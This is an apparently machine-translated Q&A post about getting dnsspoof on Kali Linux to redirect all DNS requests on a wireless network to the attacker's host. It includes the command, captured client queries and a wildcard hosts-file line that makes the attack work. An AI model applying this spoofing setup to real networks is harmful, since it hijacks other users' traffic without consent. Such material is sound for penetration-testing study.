假冒伪劣不使用本地机器的IP地址来欺骗DNS请求。

Question

我想用本地机器的IP地址欺骗所有DNS请求。

但是，在运行dnsspoof时，所有客户端都会收到真实的IP地址，而不是我的主机的假IP地址。

我知道我可以使用dnsspoof选项运行-f。但是在这种情况下，我只想用本地主机的相同地址欺骗所有DNS请求。

有什么想法吗？

root@kali:~# dnsspoof -i wlan0
dnsspoof: listening on wlan0 [udp dst port 53 and not src 192.168.1.1]
192.168.1.106.51298 > 192.168.1.1.53:  21993+ A? api-glb-bln.smoot.apple.com
192.168.1.106.60866 > 192.168.1.1.53:  65045+ A? p09-keyvalueservice.fe.apple-dns.net
192.168.1.106.55219 > 192.168.1.1.53:  29989+ A? clients1.google.com
192.168.1.106.60383 > 192.168.1.1.53:  53500+ A? gateway.fe.apple-dns.net
192.168.1.106.58017 > 192.168.1.1.53:  51772+ A? tv2.dk
192.168.1.106.49725 > 192.168.1.1.53:  43764+ A? assets.adobedtm.com
192.168.1.106.49286 > 192.168.1.1.53:  39396+ A? shared.tv2.dk
192.168.1.106.59361 > 192.168.1.1.53:  45196+ A? tv2login.dk
192.168.1.106.59450 > 192.168.1.1.53:  61943+ A? platform.twitter.com
192.168.1.106.51695 > 192.168.1.1.53:  64740+ A? cdn.optimizely.com
192.168.1.106.62386 > 192.168.1.1.53:  2942+ A? static.chartbeat.com

Answer 1

dnsspoof似乎需要一个主机文件，以便知道要回复哪个主机名的地址。在您的情况下，您希望将所有请求解析到同一个地址。来自Dsniff dnsspoof的手册：

-f hostsfile
          Specify  the  pathname  of  a  file in hosts(5) format. Only one
          hostname allowed per line (no aliases), although  hostnames  may
          contain wildcards (such as *.doubleclick.net).

注意，主机文件中的主机名可以包含通配符，以便在一行中匹配多个名称。我们可以使用它来匹配所有主机名和通配符。创建一个具有以下行的主机文件：

192.168.1.1 *

这将导致将所有主机名与您的地址192.168.1.1相匹配。

请注意，即使在这样做并使用dnsspoof标志运行-f之后，您仍然可能遇到问题，因为真正的DNS答复可能会在您之前到达受害者。其他答案可能会帮助解决这个问题。还有其他更适合用例的工具，如DNSChef。